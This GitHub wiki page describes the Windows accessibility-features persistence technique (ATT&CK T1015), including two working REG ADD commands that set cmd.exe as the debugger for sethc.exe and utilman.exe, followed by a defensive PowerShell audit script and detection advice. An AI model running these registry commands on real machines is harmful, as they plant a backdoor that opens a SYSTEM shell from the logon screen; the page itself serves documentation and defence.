T1015 Persistence Accessibility Features - CraigDonkin/Infrastructure GitHub Wiki

T1015: Persistence - Accessibility Features

  • Replacing accessibility binaries that can be launched from the logon screen (before any user signs in) with cmd.exe or another binary of choice
  • C:\Windows\System32\sethc.exe (Sticky Keys: Shift x5)
  • C:\Windows\System32\utilman.exe (Ease of Access: Windows + U)
  • Whatever is launched this way runs as SYSTEM

Binary Replacement

  • Applies to XP
  • Applies to Server 2003/R2
  • Requires at least local admin
  • Or the ability to mount the drive offline from a Linux distro

Using Debugger

  • Set cmd.exe as the debugger for the sethc.exe process (Image File Execution Options)
  • No file replacement is needed
  • Still requires local admin or the ability to boot into a live USB/disk

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
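The following read-only audit script is an added example, not part of the original wiki page; it checks a host for both variants described above (a replaced binary and an IFEO Debugger value). It assumes an elevated PowerShell session on Windows. Beyond sethc.exe and utilman.exe named on this page, it also covers the other accessibility helpers listed under ATT&CK T1015 (osk.exe, magnify.exe, narrator.exe, displayswitch.exe, atbroker.exe); that list, the `OriginalFilename` heuristic and the signature check are this example's own choices.

```powershell
# Added example (not from the wiki): audit a host for the two T1015 persistence
# variants described above. Read-only; assumes an elevated PowerShell session.

# Binaries the wiki names, plus the other accessibility helpers ATT&CK T1015
# lists; all can be launched from the logon screen before any user signs in.
$AccessibilityBinaries = @(
    'sethc.exe', 'utilman.exe',                        # named on this page
    'osk.exe', 'magnify.exe', 'narrator.exe',          # additional T1015 targets
    'displayswitch.exe', 'atbroker.exe'
)
$Ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Get-IfeoDebuggerFindings {
    # Debugger variant: a Debugger value under IFEO\<name>.exe makes Windows launch
    # that path instead of the accessibility binary. No such value is expected here.
    foreach ($name in $AccessibilityBinaries) {
        $key = Join-Path $Ifeo $name
        if (-not (Test-Path $key)) { continue }
        $debugger = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($debugger) {
            [pscustomobject]@{ Check = 'IFEO Debugger'; Target = $name; Detail = $debugger }
        }
    }
}

function Get-ReplacedBinaryFindings {
    # Replacement variant: the file itself swapped for cmd.exe. A copied cmd.exe is
    # still Microsoft-signed, so signature status alone is not enough; the embedded
    # OriginalFilename (e.g. "Cmd.Exe") no longer matching the on-disk name is the
    # tell. An invalid signature additionally catches an unsigned replacement.
    foreach ($name in $AccessibilityBinaries) {
        $path = Join-Path $env:SystemRoot "System32\$name"
        if (-not (Test-Path $path)) { continue }
        $file = Get-Item $path
        $orig = $file.VersionInfo.OriginalFilename
        if ($orig -and ($orig -ne $name)) {   # string -ne is case-insensitive in PowerShell
            [pscustomobject]@{ Check = 'OriginalFilename mismatch'; Target = $name; Detail = $orig }
        }
        $sig = Get-AuthenticodeSignature -FilePath $path
        if ($sig.Status -ne 'Valid') {
            [pscustomobject]@{ Check = 'Signature'; Target = $name; Detail = $sig.Status }
        }
    }
}

$findings = @(Get-IfeoDebuggerFindings) + @(Get-ReplacedBinaryFindings)
if ($findings.Count -eq 0) {
    Write-Output 'No T1015 indicators found.'
} else {
    $findings | Format-Table -AutoSize
}
```

Any Debugger value on these keys deserves a look, since legitimate software has no reason to debug the logon-screen accessibility helpers. The `OriginalFilename` comparison is a heuristic and should be confirmed by comparing the file hash against a known-good copy from an identical build; `sfc /verifyonly` performs the Windows Resource Protection integrity check on the same files. For ongoing detection rather than a point-in-time audit, alert on value writes beneath the IFEO key for these names (Sysmon Event ID 13, or registry object auditing) and on file writes to these paths in System32.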

MITRE ATT&CK

https://attack.mitre.org/techniques/T1015/
